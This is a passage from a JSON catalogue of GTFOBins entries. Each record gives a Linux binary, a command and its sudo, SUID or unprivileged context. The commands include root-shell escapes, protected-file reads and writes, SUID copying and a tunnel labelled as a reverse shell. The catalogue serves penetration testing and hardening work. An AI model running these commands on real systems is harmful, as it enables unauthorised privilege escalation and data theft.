context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chroot:shell:0:suid","toolId":"gtfo:chroot","toolName":"chroot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chroot / /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chroot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chrt:shell:0:sudo","toolId":"gtfo:chrt","toolName":"chrt","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chrt 1 /bin/sh","description":"Any number between 1 and 99 will do.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chrt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chrt:shell:0:suid","toolId":"gtfo:chrt","toolName":"chrt","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chrt 1 /bin/sh -p","description":"Any number between 1 and 99 will do.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chrt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chrt:shell:0:unprivileged","toolId":"gtfo:chrt","toolName":"chrt","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"chrt 1 /bin/sh","description":"Any number between 1 and 99 will do.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/chrt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:clamscan:file-read:0:sudo","toolId":"gtfo:clamscan","toolName":"clamscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"touch x.yara\nclamscan --no-summary -d x.yara -f /path/to/input-file 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'","description":"Each line of the file is interpreted as a path and the content is leaked via error messages. The output can optionally be cleaned using `sed`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/clamscan/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:clamscan:file-read:0:suid","toolId":"gtfo:clamscan","toolName":"clamscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"touch x.yara\nclamscan --no-summary -d x.yara -f /path/to/input-file 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'","description":"Each line of the file is interpreted as a path and the content is leaked via error messages. The output can optionally be cleaned using `sed`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/clamscan/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:clamscan:file-read:0:unprivileged","toolId":"gtfo:clamscan","toolName":"clamscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"touch x.yara\nclamscan --no-summary -d x.yara -f /path/to/input-file 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'","description":"Each line of the file is interpreted as a path and the content is leaked via error messages. The output can optionally be cleaned using `sed`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/clamscan/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:clisp:shell:0:sudo","toolId":"gtfo:clisp","toolName":"clisp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"clisp -x '(ext:run-shell-command \"/bin/sh\")(ext:exit)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/clisp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:clisp:shell:0:suid","toolId":"gtfo:clisp","toolName":"clisp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"clisp -x '(ext:run-shell-command \"/bin/sh\")(ext:exit)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/clisp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:clisp:shell:0:unprivileged","toolId":"gtfo:clisp","toolName":"clisp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"clisp -x '(ext:run-shell-command \"/bin/sh\")(ext:exit)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/clisp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cmake:file-read:0:sudo","toolId":"gtfo:cmake","toolName":"cmake","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cmake -E cat /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cmake/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cmake:file-read:0:unprivileged","toolId":"gtfo:cmake","toolName":"cmake","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cmake -E cat /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cmake/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cmake:shell:0:sudo","toolId":"gtfo:cmake","toolName":"cmake","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'execute_process(COMMAND /bin/sh)' >/path/to/CMakeLists.txt\ncmake /path/to/","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cmake/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cmake:shell:0:unprivileged","toolId":"gtfo:cmake","toolName":"cmake","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'execute_process(COMMAND /bin/sh)' >/path/to/CMakeLists.txt\ncmake /path/to/","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cmake/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cmp:file-read:0:sudo","toolId":"gtfo:cmp","toolName":"cmp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cmp /path/to/input-file /dev/zero -b -l","description":"Dump the bytes of the input file that are different from the NUL byte in a tabular format.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cmp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cmp:file-read:0:suid","toolId":"gtfo:cmp","toolName":"cmp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cmp /path/to/input-file /dev/zero -b -l","description":"Dump the bytes of the input file that are different from the NUL byte in a tabular format.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cmp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cmp:file-read:0:unprivileged","toolId":"gtfo:cmp","toolName":"cmp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cmp /path/to/input-file /dev/zero -b -l","description":"Dump the bytes of the input file that are different from the NUL byte in a tabular format.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cmp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cobc:shell:0:sudo","toolId":"gtfo:cobc","toolName":"cobc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'CALL \"SYSTEM\" USING \"/bin/sh\".' >/path/to/temp-file\ncobc -xFj --frelax-syntax-checks /path/to/temp-file","description":"The `/path/to/temp-file` sill be overwritten after the execution.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cobc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cobc:shell:0:suid","toolId":"gtfo:cobc","toolName":"cobc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'CALL \"SYSTEM\" USING \"/bin/sh\".' >/path/to/temp-file\ncobc -xFj --frelax-syntax-checks /path/to/temp-file","description":"The `/path/to/temp-file` sill be overwritten after the execution.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cobc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cobc:shell:0:unprivileged","toolId":"gtfo:cobc","toolName":"cobc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'CALL \"SYSTEM\" USING \"/bin/sh\".' >/path/to/temp-file\ncobc -xFj --frelax-syntax-checks /path/to/temp-file","description":"The `/path/to/temp-file` sill be overwritten after the execution.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cobc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:code:download:0:sudo","toolId":"gtfo:code","toolName":"code","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/code/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:code:download:0:unprivileged","toolId":"gtfo:code","toolName":"code","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/code/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:code:reverse-shell:0:sudo","toolId":"gtfo:code","toolName":"code","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/code/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:code:reverse-shell:0:unprivileged","toolId":"gtfo:code","toolName":"code","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/code/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:code:upload:0:sudo","toolId":"gtfo:code","toolName":"code","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/code/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:code:upload:0:unprivileged","toolId":"gtfo:code","toolName":"code","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/code/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:codex:shell:0:sudo","toolId":"gtfo:codex","toolName":"codex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"codex sandbox linux /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/codex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:codex:shell:0:unprivileged","toolId":"gtfo:codex","toolName":"codex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"codex sandbox linux /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/codex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:column:file-read:0:sudo","toolId":"gtfo:column","toolName":"column","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"column /path/to/input-file","description":"This program expects textual data.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/column/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:column:file-read:0:suid","toolId":"gtfo:column","toolName":"column","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"column /path/to/input-file","description":"This program expects textual data.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/column/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:column:file-read:0:unprivileged","toolId":"gtfo:column","toolName":"column","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"column /path/to/input-file","description":"This program expects textual data.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/column/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:comm:file-read:0:sudo","toolId":"gtfo:comm","toolName":"comm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"comm /path/to/input-file /dev/null","description":"A newline is appended to the file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/comm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:comm:file-read:0:suid","toolId":"gtfo:comm","toolName":"comm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"comm /path/to/input-file /dev/null","description":"A newline is appended to the file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/comm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:comm:file-read:0:unprivileged","toolId":"gtfo:comm","toolName":"comm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"comm /path/to/input-file /dev/null","description":"A newline is appended to the file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/comm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:composer:shell:0:sudo","toolId":"gtfo:composer","toolName":"composer","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\":{\"x\":\"/bin/sh\"}}' >composer.json\ncomposer run-script x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/composer/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:composer:shell:0:unprivileged","toolId":"gtfo:composer","toolName":"composer","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\":{\"x\":\"/bin/sh\"}}' >composer.json\ncomposer run-script x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/composer/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cowsay:inherit:0:sudo","toolId":"gtfo:cowsay","toolName":"cowsay","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"cowsay -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cowsay/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cowsay:inherit:0:unprivileged","toolId":"gtfo:cowsay","toolName":"cowsay","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"cowsay -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cowsay/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cowthink:inherit:0:sudo","toolId":"gtfo:cowthink","toolName":"cowthink","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"cowthink -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cowthink/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cowthink:inherit:0:unprivileged","toolId":"gtfo:cowthink","toolName":"cowthink","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"cowthink -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cowthink/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:file-read:0:sudo","toolId":"gtfo:cp","toolName":"cp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cp /path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:file-read:0:suid","toolId":"gtfo:cp","toolName":"cp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cp /path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:file-read:0:unprivileged","toolId":"gtfo:cp","toolName":"cp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cp /path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:file-write:0:sudo","toolId":"gtfo:cp","toolName":"cp","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | cp /dev/stdin /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:file-write:0:suid","toolId":"gtfo:cp","toolName":"cp","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | cp /dev/stdin /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:file-write:0:unprivileged","toolId":"gtfo:cp","toolName":"cp","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | cp /dev/stdin /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:privilege-escalation:0:sudo","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp /path/to/input-file /path/to/output-file","description":"This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:privilege-escalation:0:suid","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp /path/to/input-file /path/to/output-file","description":"This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:privilege-escalation:1:sudo","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp --attributes-only --preserve=all /path/to/input-file /path/to/output-file","description":"This can copy SUID permissions from any SUID binary (e.g., `/path/to/input-file`) to another.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:privilege-escalation:1:suid","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp --attributes-only --preserve=all /path/to/input-file /path/to/output-file","description":"This can copy SUID permissions from any SUID binary (e.g., `/path/to/input-file`) to another.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpan:inherit:0:sudo","toolId":"gtfo:cpan","toolName":"cpan","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"cpan\n! ...","description":"Perl code can be executed with the `!` 